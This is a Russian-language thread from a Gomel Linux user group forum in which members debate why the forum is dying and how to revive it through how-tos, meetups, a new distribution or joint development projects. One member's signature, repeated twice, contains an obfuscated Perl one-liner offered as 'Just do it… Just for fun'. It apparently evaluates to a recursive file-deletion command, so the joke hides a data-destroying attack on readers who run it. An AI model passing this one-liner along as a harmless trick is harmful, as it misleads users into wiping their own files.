Форум умирает? НЕТ!

Высказываемся по поводу портала

Форум умирает? НЕТ!

Сообщение mazzahaka » 07 янв 2011 17:29

Всем привет.
Все меньше и меньше посещаемость ресурса. Все реже вижу старых участников Gomel LUG. В конференции давно никого не наблюдаю.
Нужно возродить форум и главную страницу поднять.
Кто что думает по этому поводу?
mazzahaka

Re: Форум умирает?

Сообщение tensor » 07 янв 2011 17:53

Форум не то что бы вымирает)) Я думаю ситуация обусловлена тем, что у нас проблем как таковых стало гораздо меньше. И практически на все вопросы есть ответы у гугла. У меня проблем в последнее время с ОС никаких, даже скучновато как-то и непривычно. Кроме того, из нас практически никто не занимается (или не имеет времени и сил) заниматься разработкой. После снижения цен провайдером, практически отпала необходимость в локальных зеркалах, а лично у меня никаких новых идей пока не созрело. Мне кажется растормошить сообщество может только какой-то совместный интересный и перспективный проект, в который каждый мог бы внести посильный вклад. У нас в сообществе есть люди с большим опытом администрирования, чуть-чуть кодеров, чуть-чуть дизайнеров-художников и много добротных пользователей "средней руки". Но нет идей. Предлагайте, идеи, а там разберемся.
PS
На форум захожу каждый день.
Изображение
Just do it perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Just for fun :)
Ось должна быть в кайф!
tensor

Сообщение mazzahaka » 07 янв 2011 18:28

tensor писал(а):Мне кажется растормошить сообщество может только какой-то совместный интересный и перспективный проект, в который каждый мог бы внести посильный вклад. У нас в сообществе есть люди с большим опытом администрирования, чуть-чуть кодеров, чуть-чуть дизайнеров-художников и много добротных пользователей "средней руки". Но нет идей. Предлагайте, идеи, а там разберемся.

Да, ты прав. Сам не знаю, что придумать, но будут идеи, обязательно подкину и помогу, чем смогу.

P.S. Также посещаю каждый день :)
mazzahaka

Сообщение nimnul1980 » 07 янв 2011 19:32

IMHO конечно гугл помогает во многом. но написание любых подробных how-to касательно использование Linux, может привлечь внимание к форуму
nimnul1980

Сообщение ded maroz » 08 янв 2011 19:33

tensor писал(а): Мне кажется растормошить сообщество может только какой-то совместный интересный и перспективный проект, в который каждый мог бы внести посильный вклад. У нас в сообществе есть люди с большим опытом администрирования, чуть-чуть кодеров, чуть-чуть дизайнеров-художников и много добротных пользователей "средней руки". Но нет идей. Предлагайте, идеи, а там разберемся.

new distr
arch a simple, lightweight linux distribution
ded maroz

Сообщение Zendar » 12 янв 2011 10:47

IMHO конечно гугл помогает во многом. но написание любых подробных how-to касательно использование Linux, может привлечь внимание к форуму

How-To должны опираться на конкретную проблему. А писать кучу статей от балды - зачем оно нужно? Сидеть и выдумывать себе проблему? :) Описал в топике проблему - получил консультацию - нашел решение - написал в топике. Это и есть нормальное hоw-to.
new distr

Ну давайте мы еще железную дорогу придумаем :) Собрать дистр не проблема ниразу) Только толку от него? А кто его будет поддерживать? А кто будет собирать пакеты? А кто держать репозитории? :) Помогите лучше существующим проектам.
Zendar

Сообщение nimnul1980 » 12 янв 2011 18:39

Zendar писал(а):How-To должны опираться на конкретную проблему. А писать кучу статей от балды - зачем оно нужно? Сидеть и выдумывать себе проблему? :) Описал в топике проблему - получил консультацию - нашел решение - написал в топике. Это и есть нормальное hоw-to.

IMHO howto это не выдуманные грабли, а дележка опытом, причем именно положительным. и если нет желания делится тем что умеешь, так никто и не просит, дело сугубо добровольное. ну а тем для написания масса. для кого то установка пакета проблема, а кто то модули к ядру строчит.
P.s. а вот для решения большинства граблей есть именно гугл. правда и howto там хватает
nimnul1980

Сообщение ded maroz » 14 янв 2011 18:59

Ну давайте мы еще железную дорогу придумаем :) Собрать дистр не проблема ниразу) Только толку от него? А кто его будет поддерживать? А кто будет собирать пакеты? А кто держать репозитории? :) Помогите лучше существующим проектам.

Ну давайте мы еще железную дорогу придумаем - она уже есть, не надо.
Собрать дистр не проблема ниразу - ты их каждый день собираешь? Если для тебя это никаких проблем не составляет, то я буду тебе поклоняться)
Помогите лучше существующим проектам - каким? Сидеть и модерировать этот форум, когда тут в день бывает 3 человека??

И не нужно меня критиковать, тут просят идеи подкидывать, а не языком попусту чесать: это херня, и то херня. Каждый так может.

А на деле как оно?
ded maroz

Сообщение Zendar » 15 янв 2011 11:09

IMHO howto это не выдуманные грабли, а дележка опытом, причем именно положительным. и если нет желания делится тем что умеешь, так никто и не просит, дело сугубо добровольное. ну а тем для написания масса. для кого то установка пакета проблема, а кто то модули к ядру строчит.
P.s. а вот для решения большинства граблей есть именно гугл. правда и howto там хватает

Пожалуй, соглашусь :)

2 ded maroz:
Ну давайте мы еще железную дорогу придумаем - она уже есть, не надо.

Браво! То то и оно :)
Собрать дистр не проблема ниразу - ты их каждый день собираешь? Если для тебя это никаких проблем не составляет, то я буду тебе поклоняться)

Ну... оО По сравнению с предстоящим объемом работы по поддержке дистра сборка самого дистра действительно не проблема. http://www.linuxfromscratch.org/ Собирайте на здоровье хоть каждый день, а меня вполне устраивают существующие дистрибутивы. :mi_ga_et:
Помогите лучше существующим проектам - каким? Сидеть и модерировать этот форум, когда тут в день бывает 3 человека??

Вы много отдали сообществу? Я - нет. И если у меня будет время и желание, я буду писать патчи в существующие проекты и помогать с их переводом, а не заниматься велосипедостроением. Поверьте, Дебианы, Арчлинуксы и остальные Убунты ждут с нетерпением новых разработчиков. А кроме них еще куча дистрибутивов, гномокед и прочих проектов.
И не нужно меня критиковать, тут просят идеи подкидывать, а не языком попусту чесать: это херня, и то херня. Каждый так может.
А на деле как оно?

Так цели ведь нужно ставить реальные. Или нет? На деле? У Жана была замечательная идея о проведении мини-конференции. А возможно и не мини. Я предлагал провести инсталлфест хомячковых дистрибутивов. Это реальнее, чем дистростройка на 5 человек, правда? Однако особого рвения я не увидел. А кому надо тащить все на себе? Остается сказать "Спасибо, простите за ваше потраченное время...". А вы говорите на деле. Я Вас понимаю. Поймите и Вы: можно договорится построить шаттл во дворе.
Zendar

Сообщение ded maroz » 15 янв 2011 17:22

nimnul1980 писал(а):IMHO howto это не выдуманные грабли, а дележка опытом, причем именно положительным. и если нет желания делится тем что умеешь, так никто и не просит, дело сугубо добровольное. ну а тем для написания масса. для кого то установка пакета проблема, а кто то модули к ядру строчит.

Ну и??
Орать на весь форум, что я научился ставить кодеки, давайка всем расскажу как это сделать!
Так?
Ересь!

Zendar писал(а):Ну... оО По сравнению с предстоящим объемом работы по поддержке дистра сборка самого дистра действительно не проблема. http://www.linuxfromscratch.org/

Ты думаешь, что сборка дистра, это скачка исходников, и сборка под руководством сайта?? и все?
Я говорю не о том, что бы тупо что-то собрать, а придумать то чего вообще нет, или та и та возможность не реализована, а собрать и настроить ясен хер что не особо сложно, сложно придумать что-то новое.
Ну собрали из сыров, что надо включили, не надо убрали, и он сразу вам кофе заварит? А надо что-бы заварил! :-):
А собирать, знаю что все равно нужную функцию не получишь, потому что ее вообще нет, глупо.

Zendar писал(а):Так цели ведь нужно ставить реальные. Или нет? На деле? У Жана была замечательная идея о проведении мини-конференции. А возможно и не мини.

Что на ней обсуждать?
Как сделать работу в консоли более удобной?
Давайте нормальную проблему, интересную всем, и желательно не решенную, тогда и народ потянется.
Ну а по сути, кто будет на этой конференции? 5 человек?

Знаешь такое, кто ничего не делает, тот ничего и не добивается.

Вот например, зачем надо было придумывать Феррари, если ему проще было пойти работать в Мерседес-идеальную компанию.

Зачем вообще надо было придумывать linux, если была куча всяких bsd, миниксов, хириниксов???

Zendar писал(а):а меня вполне устраивают существующие дистрибутивы.

Вполне-это не значит полностью.
ded maroz

Сообщение nimnul1980 » 15 янв 2011 21:06

форум оживает, слышны крики 3 дровосеков :-)
Орать на весь форум, что я научился ставить кодеки, давайка всем расскажу как это сделать!
хочешь расскажи
nimnul1980

Сообщение ded maroz » 15 янв 2011 22:36

nimnul1980 писал(а):форум оживает, слышны крики 3 дровосеков :-)
хочешь расскажи

Ты третий?
ded maroz

Сообщение Zendar » 16 янв 2011 12:59

Я говорю не о том, что бы тупо что-то собрать, а придумать то чего вообще нет

new distr

"Говори, что думаешь. Думай, что говоришь." (c) Я, простите, ЛОРовских телепатов не приглашал :)

Ты думаешь, что сборка дистра, это скачка исходников, и сборка под руководством сайта?? и все?

придумать то чего вообще нет, или та и та возможность не реализована, а собрать и настроить ясен хер что не особо сложно, сложно придумать что-то новое.

Такое чувство, что Вы мой пост пропустили мимо... глаз.

Давайте нормальную проблему, интересную всем, и желательно не решенную, тогда и народ потянется.

Кэп, я узнал тебя!!!1111 Ахтунг!1!

Ну а по сути, кто будет на этой конференции? 5 человек?

Знаешь такое, кто ничего не делает, тот ничего и не добивается.

Epic fail :)

Вот например, зачем надо было придумывать Феррари, если ему проще было пойти работать в Мерседес-идеальную компанию.

А я Вам и не говорил, что новые дистрибутивы не нужны. Я Вам говорил, что в наших условиях создание дистрибутива - идея бесполезная. Был такой зародыш дистрибутива на просторах рунета. Nyashka Linux назывался. И была в нем куча разных полезных плюшек. Действительно полезных. Только этот самый очень креативный и, не побоюсь, революционный в каком-то плане дистрибутив не пережил даже стадию преальфы. Почему? А разработчиков было человек 5. Они были потрясны, но их было мало. R.I.P.
Zendar

Сообщение ded maroz » 16 янв 2011 14:29

Zendar писал(а):А я Вам и не говорил, что новые дистрибутивы не нужны. Я Вам говорил, что в наших условиях создание дистрибутива - идея бесполезная. Был такой зародыш дистрибутива на просторах рунета. Nyashka Linux назывался. И была в нем куча разных полезных плюшек. Действительно полезных. Только этот самый очень креативный и, не побоюсь, революционный в каком-то плане дистрибутив не пережил даже стадию преальфы. Почему? А разработчиков было человек 5. Они были потрясны, но их было мало. R.I.P.

:du_el:
Так я тебе что до пенсии предлагаю сидеть составом в 3 человека?

гугл - 2
окна -2
яхо - 3
Перечислять дальше?
Или ты думаешь что везде первоначально собираются не менее 1000 человек?

Ладно можешь забыть. :-):
ded maroz

Сообщение Zendar » 16 янв 2011 15:30

Кхм... А вы думаете, везде через полгода набирается тысяча? :-) Я не утверждаю, что у нас (Вас?) обязательно ничего не получится. Нет! Я только остерегаю от бесполезной траты сил. И вообще наша дискуссия скатывается в троллинг друг друга, стремящийся в бесконечность. Вы меня не понимаете. Потому прошу вопрос считать закрытым.
З.Ы. Последний вброс ^^ А у Вас есть идея, сравнимая с идеей контекстной рекламы гугла? :hi_hi_hi: А окна... Два, говорите? Все, что Аллен и Гейтс сделали гениального вдвоем - это купили DOS и спихнули его IBM :) А потом еще оставили в дураках самого Стиви Джобса с его GUI. Но это было потрясно, да :smu:sche_nie:
Zendar

Сообщение ded maroz » 16 янв 2011 16:58

Zendar писал(а):А у Вас есть идея, сравнимая с идеей контекстной рекламы гугла?

У меня много чего есть :-):

Zendar писал(а):А окна... Два, говорите? Все, что Аллен и Гейтс сделали гениального вдвоем - это купили DOS и спихнули его IBM :) А потом еще оставили в дураках самого Стиви Джобса с его GUI. Но это было потрясно, да :smu:sche_nie:

Расплывчато как-то все.
ded maroz

Сообщение kos32 » 29 янв 2011 23:25

а поднять популярость форума эта самоцель?
гомельский форум может расчитывать только на решение гомельских вопросов касатально линукса:
- популяризация дистрибутивов среди людей и организаций в Гомеле и области
- живая помощь в решении проблем в том числе offline, с личным присутствием
- локальные репы

для всего остального есть специализированые форумы с которыми мы не можем тягатся
kos32

Сообщение kos32 » 29 янв 2011 23:28

не знаю как сейчас но долгое время http://gomel.linux.by/ был не доступен из интернета (по крайней мере у меня с работы)
kos32

Сообщение night_elf » 17 июн 2011 23:41

да. мы с proghat`ом, тоже не могли очень долго достучаться до форума.
сейчас будем исправляться :)
arch - он не для ленивых и обидчивых. постарайся не забывать это ;)
night_elf

Сообщение tensor » 19 июн 2011 18:45

Действительно, из инета было раз-через-раз. Но сейчас все пашет и это хорошо.
Из новостей про себя: мне на кафедру передали 12 барахловых компов (Сel667/64 mb RAM/8 Gb) и я на их основе пытаюсь на практике освоить создание сервера терминалов. Оказывается очень увлекательная штука! Если есть желающие попрактиковаться и с конструктивными предложениями - обращайтесь. Все равно в этих мастодонтах уже ломать нечего. :-)
Изображение
Just do it perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Just for fun :)
Ось должна быть в кайф!
tensor

Re: Форум умирает? НЕТ!

Сообщение Matador » 21 июн 2011 15:54

Думаю, приписка в заголовке топика будет к месту.
Изображение
Matador
Site Admin

Сообщение Matador » 16 ноя 2012 08:41

Хм... Интересно. На спам вроде не похоже, но 3 000$ админу (пусть даже форума) в гомеле - очень интересно...
Изображение
Matador
Site Admin

Сообщение grabse » 07 янв 2013 23:03

Очень жаль, что ресурс с таким доменным именем имеет низкую активность.Правда. Видимо проблема в формате. Форум сам по себе не привлечет людей, особенно при нынешнем количестве информации.
Я думаю, сайт должен привлекать не только пользователей линукс. А по сему ресурс красочного формата "Новостной-развлекательный портал" имеет больше шансов, но и форум как неотъемлемая часть просто обязан существовать.
Ежедневная выкладка новостей линукс и не только, незатейливый айтишный юморок, агрессивная недобросовестная реклама на подобных ресурсах :-): может создать аудиторию. Вобщем есть куда стремиться.
Понимаю, сразу же вопрос - а кто всем этим будет заниматься, Да, нужна хотя бы небольшая команда энтузиастов, для которых линуксгомельбай будет не просто еще одной интернет-страничкой. Но для начала нужен организатор. Этакий Цукерберг, Дуров или кто там еще :-): .

З.Ы. Спасибо, за возможность высказаться.
grabse

Сообщение Matador » 08 янв 2013 10:47

grabse писал(а):Понимаю, сразу же вопрос - а кто всем этим будет заниматься, Да, нужна хотя бы небольшая команда энтузиастов, для которых линуксгомельбай будет не просто еще одной интернет-страничкой.

Это да. Судя по статистике, посещает форум ежедневно около 40 единиц айпишников. Но активность действительно очень маленькая. Да и гомельское коммьюнити какое-то вялое, но я списываю это на отсутствие инициативной группы. Лично я бы с удовольствием провел линуксовку даже в формате "попить пивка в баре", но как-то не получается.
Изображение
Matador
Site Admin

Сообщение Zendar » 08 янв 2013 21:02

В последнее время познакомился с тучей новых линуксоидов. Попить пива и пообщаться они, думаю, будут за. Осталось найти человека, которому не лень будет собрать людей :) А форум, в принципе, потерял свою актуальность. По большому счету теперь все или почти все проблемы можно решить просто погуглив.
Zendar

Сообщение Matador » 09 янв 2013 07:39

Zendar писал(а):В последнее время познакомился с тучей новых линуксоидов

Где они??????? Покажите!!! Познакомьте!!!

Zendar писал(а):А форум, в принципе, потерял свою актуальность

Согласен. Это было понятно с самого начала. Но как средство сбора и общения пока пускай остается. Хотелось бы все-таки сделать свой уютный гомельский ЛУГ...
Изображение
Matador
Site Admin

Сообщение TDA1541 » 28 янв 2013 15:10

Matador писал(а):Это да. Судя по статистике, посещает форум ежедневно около 40 единиц айпишников. Но активность действительно очень маленькая. Да и гомельское коммьюнити какое-то вялое, но я списываю это на отсутствие инициативной группы. Лично я бы с удовольствием провел линуксовку даже в формате "попить пивка в баре", но как-то не получается.

Предлагаю объединяться на почве разработки, это единственная идея которую не заменит интернет, имхо.

Например через опрос узнать кто какими языками\навыками владеет и слепить какую прогу для пингвина или что-то другое. Конечно, через сайты типа гитхуба это проще, а у нас по-старинке будет, мэйд ин Гомель.

Под линем трудно удержаться от творчества, в этой системе всё располагает к этому.
TDA1541

Сообщение Zendar » 29 янв 2013 13:53

Предлагаю объединяться на почве разработки

Разработки чего? Мне по сути не хватает только глобального эквалайзера для пульсы. Музыка из Grooveshark, например, звучит убого. В остальном мне вполне себе нормально живется :) А делать что-то, чем сам не будешь пользоваться - сами понимаете, бесполезно.
Zendar

Сообщение TDA1541 » 29 янв 2013 14:34

Zendar писал(а):Разработки чего? Мне по сути не хватает только глобального эквалайзера для пульсы. Музыка из Grooveshark, например, звучит убого. В остальном мне вполне себе нормально живется :) А делать что-то, чем сам не будешь пользоваться - сами понимаете, бесполезно.

Кто под линем занимается разработкой, это имелось ввиду. А если только пользователь, то да, бесполезно.
TDA1541

Сообщение Zendar » 29 янв 2013 17:57

Кто под линем занимается разработкой, это имелось ввиду. А если только пользователь, то да, бесполезно.

Людей, которые занимаются разработкой какого-то продукта под Linux в Гомеле единицы. Если вообще есть. У нас вообще 90% разработчиков работают в аутсорсинге. Оставшиеся пишут на дельфях бухгалтерию и тому подобное.
Zendar

След.

Вернуться в Отзывы и предложения